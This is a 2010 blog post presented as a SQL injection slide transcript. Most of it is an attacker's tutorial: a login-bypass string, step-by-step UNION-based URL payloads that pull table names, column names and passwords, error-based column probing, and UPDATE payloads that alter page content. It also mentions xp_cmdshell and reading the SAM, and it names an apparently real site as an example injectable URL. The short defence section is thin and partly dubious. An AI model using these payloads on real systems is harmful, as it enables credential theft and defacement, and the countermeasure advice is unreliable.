Sql Injection - Presentation Transcript ~ Learn Cyber Security

SQL INJECTION
- Introduction
- Why SQL Injection
- What is needed for this
- What you can do with SQL Injection
- What are its pros and cons
- Why we need to know and how we can prevent our database from SQL injection attacks
Introduction
- very hard to understand the conceptual idea of SQL injection without partially understanding the code that runs in the background.
- SQL is relatively easy to read, a little more difficult to write
- There is a necessity to understand the different types of SELECT commands that are mostly used to retrieve information from a database.
About SQL
- web scripting (computer) language.
- used to make dynamic websites.
- is used to insert, display and store information from a website on a server.
- One can manipulate their own site according to their will.
- Without SQL no one can even imagine to have working site(dynamic)
- works on the servers say apache, MS server etc.
- Tables:
- In an SQL database there are tables which store information.
- Tables have columns in which the records (information) are kept.
- SQL injection means to modify one or more of these tables.
- Figure A
- Names
- __________________
- |_FIRST_|_LAST____ |
- |_Jassi__|__D’costa__|
- |_Jenelia|_D’souza |
Vulnerabilities
- SQL injection vulnerabilities come in two main forms.
- Both forms involve injecting SQL code into a website.
- (1) Injecting into a form. Such as username and password boxes on a login page.
- (2) Injecting into a URL. Like http://airtellivecards.com/davinci/airtellivecards/ShowCont.aspx?LK=10
Goals :
- Your goal as an injector is to outsmart the SQL server.
- SQL server is normally running as either the local 'system' account, or a 'domain user' account, an attacker can do a great deal of harm by executing the command xp_cmdshell , xp_availablemedia may reveal the available drives on the machine.
- attacker might use xp_regXXX these functions to read the SAM, change the configuration of a system service etc.
How SQL works
- Before you can perform an injection, you must first understand how SQL works.
- the username and password you entered is kept in the site's member table
- The login form takes the conditions that you supply, and searches the member table for any rows that satisfy those conditions.
- If a row exists that has both the same username and password, then you are allowed to go on your account else print error message
- >> continued
- SQL can also display information on a website
- If a site has a news section, there may be an SQL table that, for example, holds all of the article names.
- When you click a link like this, www.site.com/news.asp?ArticleID =10 , the link tells the site to look in the table that stores the article names for an article who’s "ArticleID" is 10.
- Figure B
- Article_Name
- ___________________
- |_Article_ID_|__Title___|
- |____10____|__Cats__|
- |____11____|__Dogs__|
- |____12____|__Cows_|
Commands
- What They Are and What to Look for:
- By typing certain words called commands, you are able to tell the SQL server (the website) what you want to do to a specific table, column, or record.
- If you are injecting into a URL (link) you place your command after the "=" sign in the URL.
- If you are injecting into a form, such as a login form, put your command(s) in the boxes where you would normally type your username and password.
- (b) Familiarization and Syntax
- The manner in which you write commands is called syntax.
- You must use the right syntax in order for the SQL server to understand what you want it to do.
- You will see a language, not just words on a screen.
Form Injection
- The easiest SQL injection to perform is called "Authorization Bypass
- We must trick the website into thinking that we have supplied a correct username and password by making it return at least one row.
- The username and password boxes are each surrounded by invisible single quotes.
- Figure C __________
- Username: ' |___Bob___| '
- The username 'Bob' will be searched for in the member table.
- >>cont..
- If you have an opening quotation mark in Authorization Bypass you must always put a closing quotation mark or else you will get an error.
- -Figure D-
- ___________
- Username: ' |___z'______| '
- 'z'' (an opening quotation mark, the letter z, a closing single
- quotation mark, and an opening quotation mark) will be searched for in the member table.
- Now, let's try submitting the following z' OR 'x'='x.
- >>cont..
The INFORMATION_SCHEMA
- The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change.
- The table in the "INFORMATION_SCHEMA" that holds the names of all the other tables is called "INFORMATION_SCHEMA.TABLES.“
- The name of the tables that holds the information in "INFORMATION_SCHEMA.TABLES" is called "table_name.”
- The table in the "INFORMATION_SCHEMA" that holds the names of all the other columns is called "INFORMATION_SCHEMA.COLUMNS.“
- The name of the column that holds the information in "INFORMATION_SCHEMA.COLUMNS“ is called "column_name."
URL Injection
- In a link on a website you may find that there is an "=" sign. you will need to type commands after the "=" sign.
- Simply start typing the commands after the equals sign and click "Go" in your web browser, as if you are going to a new website.
- The example URL on which we will perform example attacks will be www.site.com/news.asp?ArticleID=10.
Attack 1
- GOAL: Obtain a username and password.
- Vulnerable URL: www.site.com/news.asp?ArticleID=10
- STEP 1: Determine if link is vulnerable.
- a. www.site.com/news.asp?ArticleID=10+AND+1=0--
- Command Translation: Display article 10 only if the number 1 is the same as the number 0.
- b. www.site.com/news.asp?ArticleID=10+AND+1=1--
- Command Translation: Display article 10 only if the number 1 is the same as the number 1.
Attack 1(cont..)
- STEP 2
- Find total number of columns displayed on the page.
- a. www.site.com/news.asp?ArticleID=10+ORDER+BY+1--
- -"ORDER BY 1" (where "1" is the column number) tells the page to display the first column on the page first.
- b. Repeat step 2a, increasing the number "1" by one each time until you receive an error.
- i. Stop when you get an error message, subtract one from this number and record it.
- ii. You have now discovered that there are n total columns on the page.
Attack 1(cont..)
- STEP 3
- Displaying table names.
- www.site.com/news.asp?ArticleID =
- - 1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
- Command Reminder: "SELECT" tells the website to display the information that you specify from the table.
- Notice: You must change the original article number (10) to negative one.
- b. www.site.com/news.asp?ArticleID =
- - 1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES--
- Reminder: You may replace any number that was displayed on the webpage (preferably only one of them) with "table_name."
- Command Translation: Show me the name of a table.
Attack 1(cont..)
- STEP 4
- Find target table name.
- a. www.site.com/news.asp?ArticleID =
- - 1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES+
- WHERE+table_name>'displayed_table'--
- Command Translation: Display the name of the next table in the list after 'displayed_table.'
- b. Repeat step 4a until a reasonable name for a members table is displayed.
- For our attack, let’s say we have found a table named "UserAccounts"
Attack 1(cont..)
- STEP 5
- Displaying column names.
- a. www.site.com/news.asp?ArticleID =
- - 1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+
- WHERE+table_name='UserAccounts'--
- Command Translation: Show me the names of the columns in the table "UserAccounts"
- STEP 6
- Find target columns .
- a. www.site.com/news.asp?ArticleID =- 1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS
- +WHERE+table_name
- ='UserAccounts'+AND+column_name>'displayed_column'--
- If you are looking for user, pass, login_name, etc...
- b. Repeat step 6a until you find the right column names.
- -For our example attack, we will imagine that we have come across columns named "username" and "password".
Attack 1(cont..)
- STEP 7
- Displaying records (finally!).
- Table Name : "UserAccounts"
- Column Names : "username“
- "password"
- a. www.site.com/news.asp?ArticleID =- 1 +UNION+SELECT+1,username,3+FROM+UserAccounts--
- Command Translation: Display the first record in the column "username" from the table "UserAccounts."
- b. www.site.com/news.asp?ArticleID =-
- 1+UNION+SELECT+1,password,3+FROM+UserAccounts+WHERE+username=‘Jassi'--
- In our hypothetical attack, the webpage has displayed “spwb."
- Username: Jassi - Password: spwb
Attack 2
- GOAL:
- Alter text displayed on a webpage.
- Vulnerable URL : www.site.com/news.asp?ArticleID = 10
- STEP 1: Find table and column name.
- a. www.site.com/news.asp?ArticleID=10+HAVING+1=1--
- This command ("HAVING+1=1") should cause an error to be shown.
- The error message will look something like this: "Column 'news.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause."
- "news.id" in the error message means that there is a column called "id" in the "news" table.
Attack 2 (cont..)
- STEP 2
- Find a useful column name.
- a . www.site.com/news.asp?ArticleID =10+GROUP+BY+id+HAVING+1=1--
- To show the next column name in the table, you add "GROUP+BY+id" before the command "HAVING."
- This command produces another error message, this time the "id" part of "news.id" in the error message will change, and this is the next column name.
- b . www.site.com/news.asp?ArticleID =10+GROUP+BY+id,release+HAVING+1=1--
- To continue displaying column names, add a comma and the column name in the error message.
Attack 2 (cont..)
- STEP 3
- Changing the webpage.
- a. www.site.com/news.asp?ArticleID =10+UPDATE+news+set+title='sql injected'--
- This will change all of the titles in the table news to "sql injected."
- b . www.site.com/news.asp?ArticleID =
- 10+UPDATE+news+set+title='sqlinjected'+WHERE+id=10—
- This will change only the title of article number 10 to "sql injected"
- you can change "id=10" to "id=8", but to see the change you must go to "www.site.com/news.asp?ArticleID=8".
- Defense & Counter-Measures
- Implement Default Error Handling. This would include using a single error message for all errors.
- Lock down User Database configuration, Specify users, roles and permissions etc.
- prefix and append a quote to all user input, even if the data is numeric .
- SPI Labs is the dedicated application security research and testing team of SPI Dynamics
- Defense of any system should be a layered blend of protection.
- Robust network architecture design will aid in the defense of any enterprise. The diagram shows a defensible network design by utilizing a De-Militarized Zone (DMZ) to hold all ‘public facing’ servers.
- Another defensive measure includes creating specific accounts on the server for specific tasks >>cont..
You will discover, grow curious, ask questions, and almost inevitably become frustrated. It will be easy to become exhausted and discouraged, but giving up never reveals the answers to your questions. Challenges are meant to be overcome. Take pride in overcoming them. Do not lose interest in your passion, whatever it may be.

...................................................................................................................................................................................................................

Learn Cyber Security

Monday, September 13, 2010

Sql Injection - Presentation Transcript

0 comments:

Post a Comment

Contributors

Blog Archive

Follow us on Facebook

Popular Posts

Categories